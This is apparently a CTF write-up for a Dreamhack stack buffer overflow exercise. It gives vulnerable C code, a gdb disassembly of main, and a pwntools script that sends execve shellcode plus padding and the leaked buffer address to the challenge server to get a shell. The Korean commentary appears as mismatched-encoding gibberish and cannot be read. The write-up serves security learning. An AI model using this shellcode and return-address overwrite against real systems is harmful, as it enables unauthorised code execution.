๐ Description
๋ณดํธ๊ธฐ๋ฒ๋ค์ ์ ์ฉ๋์ด์์ง ์์ ๊ฒ์ ํ์ธํ ์ ์๋ค.
๐ C code
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
int main(int argc, char *argv[]) {
char buf[0x80];
initialize();
printf("buf = (%p)\n", buf);
scanf("%141s", buf);
return 0;
}๋ถ์์ ํด๋ณด์. ๋จผ์ buf์ ์ฃผ์๋ฅผ ์๋ ค์ฃผ๊ณ ์๋ค. stack์ ๋ฐ๋ก leakํ ํ์๋ ์์ ๊ฒ ๊ฐ๋ค.
์ดํ 141๋ฐ์ดํธ๋ฅผ ๋ฐ์ผ๋ฏ๋ก BOF๊ฐ ๋ฐ์ํ๊ฒ ๋๋ค. (0x80์ 128์ด๋ค.)
๋ง์ฝ buf์ SFP ์ฌ์ด์ dummy๊ฐ ํฌ์ง ์๋ค๋ฉด RET๋ฅผ buf๋ก ๋ฎ์ ์ ์๊ฒ ๋ค.
์คํ์ ์คํ๊ถํ์ด ์์ผ๋ฏ๋ก buf์ shellcode๋ฅผ ๋ฃ์ผ๋ฉด ๋ฌธ์ ๊ฐ ํ๋ฆฌ๊ฒ ๋ ๊ฒ ๊ฐ๋ค.
๐ Debugging
dummy๋ฅผ ํ์ธํด๋ณด์.
gdb-peda$ disas main
Dump of assembler code for function main:
0x080485d9 <+0>: push ebp
0x080485da <+1>: mov ebp,esp
0x080485dc <+3>: add esp,0xffffff80
0x080485df <+6>: call 0x8048592 <initialize>
0x080485e4 <+11>: lea eax,[ebp-0x80]
0x080485e7 <+14>: push eax
0x080485e8 <+15>: push 0x8048699
0x080485ed <+20>: call 0x80483f0 <printf@plt>
0x080485f2 <+25>: add esp,0x8
0x080485f5 <+28>: lea eax,[ebp-0x80]
0x080485f8 <+31>: push eax
0x080485f9 <+32>: push 0x80486a5
0x080485fe <+37>: call 0x8048460 <__isoc99_scanf@plt>
0x08048603 <+42>: add esp,0x8
0x08048606 <+45>: mov eax,0x0
0x0804860b <+50>: leave
0x0804860c <+51>: ret
End of assembler dump.scanf๋ฅผ ๋ฐ์ ๋ [ebp-0x80]์ eax์ ๋ฃ๊ณ pushํ๋ ์ ์ผ๋ก ๋ณด์ dummy๋ ์์์ด ํ์ธ๋๋ค.
๐ Exploit
shellcode๋ 26byte์ด๋ค.
exploit.py
from pwn import *
shellcode = '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80' #26byte
p = remote('host3.dreamhack.games', 15331)
p.recvuntil('buf = (')
buf_addr = int(p.recvline()[:-2], 16)
payload = shellcode + 'A' * (132-26) + p32(buf_addr)
p.send(payload)
p.interactive()
ํด๊ฒฐ๋๋ค.
Today I Learned